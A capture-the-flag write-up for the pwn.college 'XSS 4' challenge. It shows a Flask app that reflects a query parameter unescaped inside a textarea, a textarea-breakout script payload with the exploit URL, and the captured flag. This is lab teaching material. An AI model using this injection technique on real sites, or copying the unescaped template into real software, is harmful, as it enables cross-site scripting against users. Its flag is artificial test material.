π‘οΈ XSS 4 β Writeup
Writeup from Web Security
π Challenge Information
- Category: Web Exploitation
- Challenge Name: XSS 4
- Platform: pwn.college
- Tags:
XSS,Reflected,Textarea Injection,Script Injection,JavaScript,DOM
π Description
We are given a Flask web app that displays a message entered in a <textarea> tag through the msg query parameter. Our goal is to inject JavaScript into the rendered HTML page and trigger an alert box to capture the flag.
π Source Code
#!/opt/pwn.college/python
import flask
import os
app = flask.Flask(__name__)
@app.route("/", methods=["GET"])
def challenge_get():
return f"""
<html><body>
<h1>pwnmsg ephemeral message service</h1>
The message:
<form>
<textarea name=msg>{flask.request.args.get("msg", "Type your message here!")}</textarea>
<input type=submit value="Make URL!">
</form>
</body></html>
"""
app.secret_key = os.urandom(8)
app.config["SERVER_NAME"] = f"challenge.localhost:80"
app.run("challenge.localhost", 80)
π§ Vulnerability Analysis
The key vulnerability here lies in the way user input is directly embedded inside a <textarea> tag without any sanitization or escaping:
<textarea name=msg>{user-controlled-input}</textarea>
This allows us to break out of the </textarea> context and inject our own HTML/JavaScript content.
π― Exploit
By closing the existing <textarea> tag and inserting a <script> block, we can execute arbitrary JavaScript code in the victimβs browser.
β Payload:
</textarea><script>alert("PWNED")</script><textarea>
π Full URL:
http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>
π Execution
We use the /challenge/victim command to simulate a visit by a vulnerable user or bot:
hacker@web-security~xss-4:~$ /challenge/victim 'http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>'
This results in:
Visiting http://challenge.localhost/?msg=</textarea><script>alert("PWNED")</script><textarea>
Alert triggered! Your reward:
pwn.college{Ysj7zmjBRnYiY7FcGZ1v35gxDuU.QX1kzMzwSM0IzMyEzW}
π Flag
pwn.college{Ysj7zmjBRnYiY7FcGZ1v35gxDuU.QX1kzMzwSM0IzMyEzW}